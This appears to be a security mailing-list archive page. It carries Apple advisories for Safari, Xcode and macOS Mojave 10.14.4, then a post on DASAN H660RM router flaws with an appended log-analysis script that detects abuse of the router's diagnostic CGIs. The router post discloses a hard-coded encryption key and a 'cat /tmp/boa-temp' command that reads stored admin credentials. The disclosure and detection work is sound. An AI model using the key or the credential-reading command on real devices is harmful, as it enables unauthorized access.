Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6201: dwfault working with ADLab of Venustech
CVE-2019-8518: Samuel Groß of Google Project Zero
CVE-2019-8523: Apple
CVE-2019-8524: G. Geshev working with Trend Micro Zero Day Initiative
CVE-2019-8558: Samuel Groß of Google Project Zero
CVE-2019-8559: Apple
CVE-2019-8563: Apple

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may disclose
sensitive user information
Description: A cross-origin issue existed with the fetch API. This
was addressed with improved input validation.
CVE-2019-8515: James Lee (@Windowsrcer)

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8536: Apple
CVE-2019-8544: an anonymous researcher

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-7285: dwfault working at ADLab of Venustech
CVE-2019-8556: Apple

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A logic issue was addressed with improved validation.
CVE-2019-8503: Linus Särud of Detectify

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: A validation issue was addressed with improved logic.
CVE-2019-7292: Zhunki and Zhiyi Zhang of 360 ESG Codesafe Team

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: A memory corruption issue was addressed with improved
validation.
CVE-2019-8562: Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of
Chaitin Security Research Lab

WebKit
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, and
Mojave 10.14.4
Impact: Processing maliciously crafted web content may lead to
universal cross site scripting
Description: A logic issue was addressed with improved validation.
CVE-2019-8551: Ryan Pickren (ryanpickren.com)

Additional recognition

Safari
We would like to acknowledge Nikhil Mittal (@c0d3G33k) of Payatu Labs
(payatu.com) for their assistance.

WebKit
We would like to acknowledge Andrey Kovalev of Yandex Security Team
for their assistance.

Installation note:

Safari 12.1 may be obtained from the Mac App Store.

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

APPLE-SA-2019-3-25-7 Xcode 10.2

2019-03-26 Thread Apple Product Security

APPLE-SA-2019-3-25-7 Xcode 10.2

Xcode 10.2 is now available and addresses the following:

Kernel
Available for: macOS 10.13.6 or later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4461: Ian Beer of Google Project Zero

Installation note:

Xcode 10.2 may be obtained from:

https://developer.apple.com/xcode/downloads/

To check that Xcode has been updated:

* Select Xcode in the menu bar
* Select About Xcode
* The version after applying this update will be "10.2".

Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/


APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, Security Update 2019-002 Sierra

2019-03-26 Thread Apple Product Security

APPLE-SA-2019-3-25-2 macOS Mojave 10.14.4, Security Update
2019-002 High Sierra, Security Update 2019-002 Sierra

macOS Mojave 10.14.4, Security Update 2019-002 High Sierra, and
Security Update 2019-002 Sierra are now available and
address the following:

AppleGraphicsControl
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A buffer overflow was addressed with improved size
validation.
CVE-2019-8555: Zhiyi Zhang of 360 ESG Codesafe Team, Zhuo Liang and
shrek_wzw of Qihoo 360 Nirvan Team

Bom
Available for: macOS Mojave 10.14.3
Impact: A malicious application may bypass Gatekeeper checks
Description: This issue was addressed with improved handling of file
metadata.
CVE-2019-6239: Ian Moorhouse and Michael Trimm

CFString
Available for: macOS Mojave 10.14.3
Impact: Processing a maliciously crafted string may lead to a denial
of service
Description: A validation issue was addressed with improved logic.
CVE-2019-8516: SWIPS Team of Frifee Inc.

configd
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8552: Mohamed Ghannam (@_simo36)

Contacts
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow issue was addressed with improved
memory handling.
CVE-2019-8511: an anonymous researcher

CoreCrypto
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

DiskArbitration
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: An encrypted volume may be unmounted and remounted by a
different user without prompting for the password
Description: A logic issue was addressed with improved state
management.
CVE-2019-8522: Colin Meginnis (@falc420)

FaceTime
Available for: macOS Mojave 10.14.3
Impact: A user's video may not be paused in a FaceTime call if they
exit the FaceTime app while the call is ringing
Description: An issue existed in the pausing of FaceTime video. The
issue was resolved with improved logic.
CVE-2019-8550: Lauren Guzniczak of Keystone Academy

Feedback Assistant
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to gain root privileges
Description: A race condition was addressed with additional
validation.
CVE-2019-8565: CodeColorist of Ant-Financial LightYear Labs

Feedback Assistant
Available for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS
Mojave 10.14.3
Impact: A malicious application may be able to overwrite arbitrary
files
Description: This issue was addressed with improved checks.
CVE-2019-8521: CodeColorist of Ant-Financial LightYear Labs

file
Available for: macOS Mojave 10.14.3
Impact: Processing a maliciously crafted file might disclose user
information
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-6237: an anonymous researcher

Graphics Drivers
Available for: macOS Mojave 10.14.3
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8519: Aleksandr Tarasikov (@astarasikov), Juwei Lin
(@panicaII) and Junzhi Lu of Trend Micro Research working with Trend
Micro's Zero Day Initiative

iAP
Available for: macOS Mojave 10.14.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved bounds
checking.
CVE-2019-8542: an anonymous researcher

IOGraphics
Available for: macOS Mojave 10.14.3
Impact: A Mac may not lock when disconnecting from an external
monitor
Description: A lock handling issue was addressed with improved lock
handling.
CVE-2019-8533: an anonymous researcher, James Eagan of Télécom
ParisTech, R. Scott Kemp of MIT, Romke van Dijk of Z-CERT

IOHIDFamily
Available for: macOS Mojave 10.14.3
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: A memory corruption issue was addressed with improved
state management.
CVE-2019-8545: Adam Donenfeld (@doadam) of the Zimperium zLabs Team

IOKit
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3
Impact: A local user may be able to read kernel memory
Description: A memory initialization issue was addressed with
improved memory handling.
CVE-2019-8504: an anonymous researcher

IOKit SCSI
Available for: macOS High Sierra 10.13.6, macOS Mojave 10.14.3
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8529: Juwei 

Multiple vulnerabilities in DASAN H660RM GPON router firmware

2019-03-26 Thread Krzysztof Burghardt
Hi!

CVE-2019-9974: diag_tool.cgi on DASAN H660RM devices with firmware
1.03-0022 allows spawning ping processes without any authorization
leading to information disclosure and DoS attacks

A remote attacker could enumerate hosts on the LAN interface by sending
requests to /cgi-bin/diag_tool.cgi with the ip parameter set to the target
IP address. Lack of authorization in /cgi-bin/diag_get_result.cgi allows
retrieval of the results. Each call to diag_get_result.cgi retrieves one
line of ping (or traceroute) output.

The same CGI script has another weakness, CWE-400: Uncontrolled Resource
Consumption, which allows a memory exhaustion Denial of Service (DoS)
attack against the device. Around 170 spawned ping processes are enough
to cause a crash and reboot of the router. A PoC exploit is available.

More: 
https://blog.burghardt.pl/2019/03/diag_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-allows-spawning-ping-processes-without-any-authorization-leading-to-information-disclosure-and-dos-attacks/


CVE-2019-9975: syslog_tool.cgi on DASAN H660RM devices with firmware
1.03-0022 uses a hard-coded key for logs encryption

DASAN uses a hard-coded key “dasanektks123” for logs encryption. Data
stored using this key can be decrypted by anyone able to access this
key.

More: 
https://blog.burghardt.pl/2019/03/syslog_tool-cgi-on-dasan-h660rm-devices-with-firmware-1-03-0022-uses-a-hard-coded-key-for-logs-encryption/


CVE-2019-9976: Boa Webserver on DASAN H660RM devices with firmware
1.03-0022 saves post data, including credentials, to /tmp/boa-temp

Exploitation is possible for users logged in over telnet or SSH. If a
user logged in through the Web UI, then until they make any other POST
request, their credentials can be retrieved with:

$ cat /tmp/boa-temp
StatusActionFlag=-1=admin=vertex25

More: 
https://blog.burghardt.pl/2019/03/boa-webserver-on-dasan-h660rm-devices-with-firmware-1-03-0022-saves-post-data-including-credentials-to-tmp-boa-temp/

BR,
-- 
Krzysztof Burghardt 
http://www.burghardt.pl/
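The two diagnostic CGIs named in the CVE-2019-9974 post can be abused either for host enumeration (many distinct `ip=` targets from one client) or for ping-process exhaustion (many `diag_tool.cgi` calls from one client). The following script is an added defender-side example and is not part of the advisory or of any DASAN code: it scans web-server access-log lines in Common Log Format for those two paths and raises an alert on each pattern. The log lines, the client addresses, and the alert thresholds (`ENUM_THRESHOLD`, `SPAWN_THRESHOLD`) are constructed for this example; the advisory only states that roughly 170 spawned ping processes crash the device, so the spawn threshold is set well below that.

```python
"""Detection helper for abuse of the H660RM diagnostic CGIs (added example).

Scans access-log lines in Common Log Format for requests to the two CGI
endpoints named in the advisory and reports two patterns per client:
  * many distinct ``ip=`` targets  -> LAN host enumeration
  * many diag_tool.cgi requests    -> ping-process / memory exhaustion
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Endpoints named in the advisory.
DIAG_SPAWN = "/cgi-bin/diag_tool.cgi"
DIAG_RESULT = "/cgi-bin/diag_get_result.cgi"

# Thresholds are assumptions for this example, not values from the advisory.
ENUM_THRESHOLD = 10    # distinct ip= targets seen from one client
SPAWN_THRESHOLD = 50   # diag_tool.cgi requests seen from one client

# Minimal Common Log Format matcher: client, method, request target, status.
_CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')


def parse_line(line):
    """Return (client, method, path, query_dict, status), or None if not CLF."""
    m = _CLF.match(line)
    if not m:
        return None
    client, method, target, status = m.groups()
    parts = urlsplit(target)
    return client, method, parts.path, parse_qs(parts.query), int(status)


def analyze(lines):
    """Count diagnostic-CGI use per client and return counters plus alerts.

    Alerts are tuples (client, kind, count) with kind either
    "enumeration" or "process-exhaustion".
    """
    targets = defaultdict(set)    # client -> distinct ip= values requested
    spawns = defaultdict(int)     # client -> diag_tool.cgi requests
    result_polls = defaultdict(int)  # client -> diag_get_result.cgi requests
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue                # skip lines that are not access-log records
        client, _method, path, query, _status = rec
        if path == DIAG_SPAWN:
            spawns[client] += 1
            for ip in query.get("ip", []):
                targets[client].add(ip)
        elif path == DIAG_RESULT:
            result_polls[client] += 1

    alerts = []
    for client, ips in targets.items():
        if len(ips) >= ENUM_THRESHOLD:
            alerts.append((client, "enumeration", len(ips)))
    for client, n in spawns.items():
        if n >= SPAWN_THRESHOLD:
            alerts.append((client, "process-exhaustion", n))
    return {"targets": dict(targets), "spawns": dict(spawns),
            "result_polls": dict(result_polls), "alerts": alerts}


def sample_log():
    """Constructed access-log lines; not real device output."""
    fmt = '{c} - - [26/Mar/2019:10:00:{s:02d} +0100] "GET {p} HTTP/1.1" 200 17'
    lines = []
    # Client A sweeps 12 LAN addresses, polling one result line after each.
    for i in range(1, 13):
        lines.append(fmt.format(c="192.168.1.50", s=i % 60,
                                p=f"{DIAG_SPAWN}?ip=192.168.1.{i}"))
        lines.append(fmt.format(c="192.168.1.50", s=i % 60, p=DIAG_RESULT))
    # Client B fires 60 ping requests at one address and never reads results.
    for i in range(60):
        lines.append(fmt.format(c="192.168.1.77", s=i % 60,
                                p=f"{DIAG_SPAWN}?ip=192.168.1.1"))
    # Client C runs a single ordinary diagnostic and views a page.
    lines.append(fmt.format(c="192.168.1.20", s=5, p=f"{DIAG_SPAWN}?ip=192.168.1.1"))
    lines.append(fmt.format(c="192.168.1.20", s=6, p="/index.html"))
    lines.append("not an access-log line")
    return lines


if __name__ == "__main__":
    for alert in analyze(sample_log())["alerts"]:
        print("ALERT client=%s kind=%s count=%d" % alert)
```

Because the endpoints require no authorization on the affected firmware, a session cookie cannot be used to separate legitimate from illegitimate calls; the per-client volume and target-diversity counters above are the signal that remains once the device's web logs are forwarded to a collector.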